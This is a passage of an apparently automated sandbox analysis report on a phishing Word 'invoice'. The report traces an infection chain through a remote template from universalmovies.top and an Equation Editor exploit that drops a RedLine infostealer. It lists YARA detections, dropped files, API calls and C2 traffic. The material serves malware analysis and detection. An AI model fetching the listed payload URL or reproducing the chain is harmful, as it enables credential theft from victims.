                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: String function: 00258B40 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: String function: 00250D27 appears 70 times
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: String function: 00237F41 appears 35 times
                  Source: ExtExport2[1].exe.9.drStatic PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW
                  Source: notorious53209.exe.9.drStatic PE information: Resource name: RT_STRING type: ARC archive data, dynamic LZW
                  Source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 10.2.notorious53209.exe.170000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 10.2.notorious53209.exe.170000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000000A.00000002.395538045.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000C.00000002.439069013.00000000000E2000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: notorious53209.exe PID: 3468, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3536, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\notorious[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9B70A7F.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/54@16/3
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029A2D5 GetLastError,FormatMessageW,10_2_0029A2D5
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00288713 AdjustTokenPrivileges,CloseHandle,10_2_00288713
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00288CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00288CC3
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,10_2_0029B59E
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002AF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_002AF121
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0029C602 CoInitialize,CoCreateInstance,CoUninitialize,10_2_0029C602
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00234FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00234FE9
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$voice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR78B7.tmpJump to behavior
                  Source: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docOLE indicator, Word Document stream: true
                  Source: tmp6E21.tmp.12.drOLE indicator, Word Document stream: true
                  Source: ~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmp.0.drOLE document summary: author field not present or empty
                  Source: ~WRF{CD326501-1350-4080-AA2C-AD93E1795262}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docReversingLabs: Detection: 36%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: tmp6E21.tmp.12.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: notorious53209.exe, 0000000A.00000003.395345081.0000000002B50000.00000004.00001000.00020000.00000000.sdmp, notorious53209.exe, 0000000A.00000003.395468267.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docInitial sample: OLE indicators vbamacros = False
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0034F090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,10_2_0034F090
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0054F95C push ds; iretd 9_2_0054F95D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00566442 push ebp; ret 9_2_0056644B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00559170 push eax; retf 9_2_00559171
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0056647A push ebp; ret 9_2_0056647B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00566460 push ebp; ret 9_2_0056646B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00565A36 push ebp; ret 9_2_00565A37
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00565A3E push ebp; ret 9_2_00565A3F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0056643A push ebp; ret 9_2_0056643B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005663DF push ebp; ret 9_2_005663EB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0055A5C0 push eax; retn 0055h9_2_0055A5C1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005501F4 push eax; retf 9_2_005501F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005663FF push ebp; ret 9_2_0056640B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005665E6 push ebp; ret 9_2_005665E7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_005665EC push ebp; ret 9_2_005665EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0056648A push ebp; ret 9_2_0056648B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00566388 push ebp; ret 9_2_0056638B
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_0023C590 push eax; retn 0023h10_2_0023C599
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00258B85 push ecx; ret 10_2_00258B98
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1
                  Source: initial sampleStatic PE information: section name: UPX0
                  Source: initial sampleStatic PE information: section name: UPX1

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\universalmovies.top@SSL\DavWWWRootJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\universalmovies.top@SSL\DavWWWRootJump to behavior
                  Source: settings.xml.relsExtracted files from sample: https://universalmovies.top/notorious.doc
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: notorious[1].doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: D9B70A7F.doc.0.drJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\notorious53209.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\ExtExport2[1].exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\NamesJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 7474
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49179
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_00234A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00234A35
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002B55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_002B55FD
                  Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 10_2_002533C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_002533C7
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
